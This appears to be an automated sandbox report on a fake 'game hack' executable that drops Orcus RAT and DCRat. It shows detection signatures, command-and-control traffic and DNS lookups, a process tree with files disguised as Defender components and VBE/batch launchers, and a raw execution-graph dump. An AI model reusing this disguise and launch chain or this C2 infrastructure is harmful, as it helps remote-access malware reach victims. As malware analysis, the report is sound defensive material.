                                     KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                     gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                                     Language of compilation system | Country where language is spoken | Map
                                     English | United States |
                                     Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                     2025-01-13T13:35:58.469462+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.7 | 49853 | 37.44.238.250 | 80 | TCP
                                     2025-01-13T13:36:13.751539+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.7 | 49907 | 37.44.238.250 | 80 | TCP
                                     2025-01-13T13:36:23.086316+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49956 | 37.44.238.250 | 80 | TCP
                                     2025-01-13T13:36:34.528892+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.7 | 50015 | 37.44.238.250 | 80 | TCP
                                     2025-01-13T13:37:23.993180+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.7 | 50039 | 37.44.238.250 | 80 | TCP
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Jan 13, 2025 13:35:21.600064993 CET | 49702 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:35:21.604962111 CET | 25350 | 49702 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:35:21.605140924 CET | 49702 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:35:21.624763966 CET | 49702 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:35:21.629697084 CET | 25350 | 49702 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:35:42.995593071 CET | 25350 | 49702 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:35:42.995867014 CET | 49702 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:35:43.247802973 CET | 49803 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:35:43.255390882 CET | 25350 | 49803 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:35:43.255624056 CET | 49803 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:35:43.263974905 CET | 49803 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:35:43.268783092 CET | 25350 | 49803 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:36:04.638967037 CET | 25350 | 49803 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:36:04.639030933 CET | 49803 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:04.759735107 CET | 49873 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:04.765275002 CET | 25350 | 49873 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:36:04.765377998 CET | 49873 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:04.834270000 CET | 49873 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:04.839226961 CET | 25350 | 49873 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:36:26.137505054 CET | 25350 | 49873 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:36:26.138348103 CET | 49873 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:26.340481043 CET | 49979 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:26.345298052 CET | 25350 | 49979 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:36:26.345360994 CET | 49979 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:26.345844984 CET | 49979 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:26.350559950 CET | 25350 | 49979 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:36:47.720897913 CET | 25350 | 49979 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:36:47.720968008 CET | 49979 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:47.837014914 CET | 50023 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:47.982923985 CET | 25350 | 50023 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:36:47.983020067 CET | 50023 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:47.984250069 CET | 50023 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:36:47.989108086 CET | 25350 | 50023 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:37:09.338479996 CET | 25350 | 50023 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:37:09.338690042 CET | 50023 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:37:09.454456091 CET | 50034 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:37:09.459547043 CET | 25350 | 50034 | 185.37.62.158 | 192.168.2.7
                                     Jan 13, 2025 13:37:09.459645033 CET | 50034 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:37:09.460186005 CET | 50034 | 25350 | 192.168.2.7 | 185.37.62.158
                                     Jan 13, 2025 13:37:09.465022087 CET | 25350 | 50034 | 185.37.62.158 | 192.168.2.7
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jan 13, 2025 13:35:21.228759050 CET | 53797 | 53 | 192.168.2.7 | 1.1.1.1
                                    Jan 13, 2025 13:35:21.584316969 CET | 53 | 53797 | 1.1.1.1 | 192.168.2.7
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Jan 13, 2025 13:35:21.228759050 CET | 192.168.2.7 | 1.1.1.1 | 0x1ea4 | Standard query (0) | 25350.client.sudorat.top | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Jan 13, 2025 13:35:21.584316969 CET | 1.1.1.1 | 192.168.2.7 | 0x1ea4 | No error (0) | 25350.client.sudorat.top | | 185.37.62.158 | A (IP address) | IN (0x0001) | false

                                    Target ID:0
                                    Start time:07:35:12
                                    Start date:13/01/2025
                                    Path:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe"
                                    Imagebase:0xa00000
                                    File size:9'469'375 bytes
                                    MD5 hash:35A0FBEC2FC6D2A550A569719406D58D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    Reputation:low
                                    Has exited:true

                                    Target ID:6
                                    Start time:07:35:15
                                    Start date:13/01/2025
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe"
                                    Imagebase:0xcd0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:07:35:15
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe"
                                    Imagebase:0x240000
                                    File size:3'115'520 bytes
                                    MD5 hash:10E817A4D5E216279A8DE8ED71C91044
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: 00000007.00000000.1286933996.0000000000242000.00000002.00000001.01000000.00000009.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: 00000007.00000000.1286933996.0000000000242000.00000002.00000001.01000000.00000009.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: Joe Security
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 84%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:8
                                    Start time:07:35:15
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe"
                                    Imagebase:0xed0000
                                    File size:1'700'533 bytes
                                    MD5 hash:BC7804FCA6DD09B4F16E86D80B8D28FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 66%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:9
                                    Start time:07:35:15
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe"
                                    Imagebase:0x400000
                                    File size:4'796'928 bytes
                                    MD5 hash:E8C32CC88DB9FEF57FD9E2BB6D20F70B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 58%, ReversingLabs
                                    Reputation:low
                                    Has exited:false

                                    Target ID:11
                                    Start time:07:35:16
                                    Start date:13/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:12
                                    Start time:07:35:16
                                    Start date:13/01/2025
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe"
                                    Imagebase:0xcd0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:07:35:17
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe"
                                    Imagebase:0xbb0000
                                    File size:3'115'520 bytes
                                    MD5 hash:10E817A4D5E216279A8DE8ED71C91044
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: Joe Security
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 84%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:17
                                    Start time:07:35:18
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
                                    Imagebase:0xb20000
                                    File size:3'115'520 bytes
                                    MD5 hash:10E817A4D5E216279A8DE8ED71C91044
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:18
                                    Start time:07:35:18
                                    Start date:13/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                    Imagebase:0xbc0000
                                    File size:65'440 bytes
                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:21
                                    Start time:07:35:21
                                    Start date:13/01/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
                                    Imagebase:0x410000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:22
                                    Start time:07:35:21
                                    Start date:13/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:23
                                    Start time:07:35:21
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
                                    Imagebase:0xf10000
                                    File size:569'844 bytes
                                    MD5 hash:00C4245522082B7F87721F9A26E96BA4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1959832866.000000001322D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 68%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:24
                                    Start time:07:35:23
                                    Start date:13/01/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "
                                    Imagebase:0x410000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:25
                                    Start time:07:35:23
                                    Start date:13/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:26
                                    Start time:07:35:23
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
                                    Imagebase:0x1d0000
                                    File size:1'383'424 bytes
                                    MD5 hash:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1720636580.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1846009611.00000000125BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 78%, ReversingLabs
                                    Has exited:true

                                    Target ID:27
                                    Start time:07:35:23
                                    Start date:13/01/2025
                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                    Wow64 process (32bit):false
                                    Commandline:wmic diskdrive get model,serialnumber
                                    Imagebase:0x7ff641cc0000
                                    File size:576'000 bytes
                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:33
                                    Start time:07:35:29
                                    Start date:13/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
                                    Imagebase:0x7ff6160a0000
                                    File size:2'759'232 bytes
                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:34
                                    Start time:07:35:29
                                    Start date:13/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:38
                                    Start time:07:35:30
                                    Start date:13/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP"
                                    Imagebase:0x7ff668d90000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:9.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:10.3%
                                      Total number of Nodes:1481
                                      Total number of Limit Nodes:25
                                      [Execution graph: interactive call-graph view rooted at execution_graph; its nodes (function addresses in the 0xa0xxxx image range annotated with their Win32 API calls, e.g. TlsAlloc, GetProcAddress, LoadLibraryExW, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, CreateFileMappingW, MapViewOfFile, ShellExecuteExW, GetDlgItem, SendMessageW, DialogBoxParamW) and their edges are not reproducible as text]
GetWindowLongW SetWindowLongW 23443->23578 23444->23282 23444->23283 23444->23314 23447 a01336 23447->23444 23448 a01349 GetDlgItem 23447->23448 23448->23444 23449 a01359 23448->23449 23449->23444 23450 a0135f SetWindowTextW 23449->23450 23450->23444 23454 a0a059 23451->23454 23452 a0a0ea 23453 a0a207 9 API calls 23452->23453 23455 a0a113 23452->23455 23453->23455 23454->23452 23454->23455 23579 a0a207 23454->23579 23455->23347 23455->23348 23457->23357 23459 a09728 23458->23459 23460 a09792 CreateFileW 23459->23460 23461 a09786 23459->23461 23460->23461 23462 a097e4 23461->23462 23463 a0b66c 2 API calls 23461->23463 23462->23405 23464 a097cb 23463->23464 23464->23462 23465 a097cf CreateFileW 23464->23465 23465->23462 23467 a09677 23466->23467 23468 a09688 23466->23468 23467->23468 23469 a09683 23467->23469 23470 a0968a 23467->23470 23468->23368 23600 a09817 23469->23600 23605 a096d0 23470->23605 23473->23386 23474->23395 23620 a0ddff 23475->23620 23478 a012e6 GetDlgItem ShowWindow 23478->23411 23480 a1bdff __EH_prolog 23479->23480 23481 a1b4e5 23480->23481 23482 a1aa36 ExpandEnvironmentStringsW 23480->23482 23481->23423 23493 a1be36 _wcsrchr 23482->23493 23484 a1aa36 ExpandEnvironmentStringsW 23484->23493 23485 a1c11d SetWindowTextW 23485->23493 23488 a235de 22 API calls 23488->23493 23490 a1bf0b SetFileAttributesW 23492 a1bfc5 GetFileAttributesW 23490->23492 23503 a1bf25 ___scrt_fastfail 23490->23503 23492->23493 23495 a1bfd7 DeleteFileW 23492->23495 23493->23481 23493->23484 23493->23485 23493->23488 23493->23490 23496 a1c2e7 GetDlgItem SetWindowTextW SendMessageW 23493->23496 23500 a1c327 SendMessageW 23493->23500 23643 a117ac CompareStringW 23493->23643 23644 a19da4 GetCurrentDirectoryW 23493->23644 23646 a0a52a 7 API calls 23493->23646 23647 a0a4b3 FindClose 23493->23647 23648 a1ab9a 76 API calls ___std_exception_copy 23493->23648 23495->23493 23497 a1bfe8 23495->23497 23496->23493 23498 a0400a _swprintf 51 API calls 23497->23498 23499 a1c008 
GetFileAttributesW 23498->23499 23499->23497 23501 a1c01d MoveFileW 23499->23501 23500->23493 23501->23493 23502 a1c035 MoveFileExW 23501->23502 23502->23493 23503->23492 23503->23493 23645 a0b4f7 52 API calls 2 library calls 23503->23645 23505 a1d0ff __EH_prolog 23504->23505 23649 a0fead 23505->23649 23507 a1d130 23653 a05c59 23507->23653 23509 a1d14e 23657 a07c68 23509->23657 23513 a1d1a1 23674 a07cfb 23513->23674 23515 a1b504 23515->23433 23517 a1cd38 23516->23517 24162 a19d1a 23517->24162 23520 a1cd45 GetWindow 23521 a1b5d1 23520->23521 23524 a1cd65 23520->23524 23521->23291 23521->23292 23522 a1cd72 GetClassNameW 24167 a117ac CompareStringW 23522->24167 23524->23521 23524->23522 23525 a1cd96 GetWindowLongW 23524->23525 23526 a1cdfa GetWindow 23524->23526 23525->23526 23527 a1cda6 SendMessageW 23525->23527 23526->23521 23526->23524 23527->23526 23528 a1cdbc GetObjectW 23527->23528 24168 a19d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23528->24168 23530 a1cdd3 24169 a19d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23530->24169 24170 a19f5d 8 API calls ___scrt_fastfail 23530->24170 23533 a1cde4 SendMessageW DeleteObject 23533->23526 23534->23302 23536 a1a2e8 23535->23536 23537 a1a30d 23535->23537 24173 a117ac CompareStringW 23536->24173 23539 a1a312 SHAutoComplete 23537->23539 23540 a1a31b 23537->23540 23539->23540 23543 a1a7c3 23540->23543 23541 a1a2fb 23541->23537 23542 a1a2ff FindWindowExW 23541->23542 23542->23537 23544 a1a7cd __EH_prolog 23543->23544 23545 a01380 82 API calls 23544->23545 23546 a1a7ef 23545->23546 24174 a01f4f 23546->24174 23549 a1a809 23551 a01631 84 API calls 23549->23551 23550 a1a818 23552 a01951 126 API calls 23550->23552 23553 a1a814 23551->23553 23554 a1a83a __vsnwprintf_l ___std_exception_copy 23552->23554 23553->23332 23553->23337 23554->23553 23555 a01631 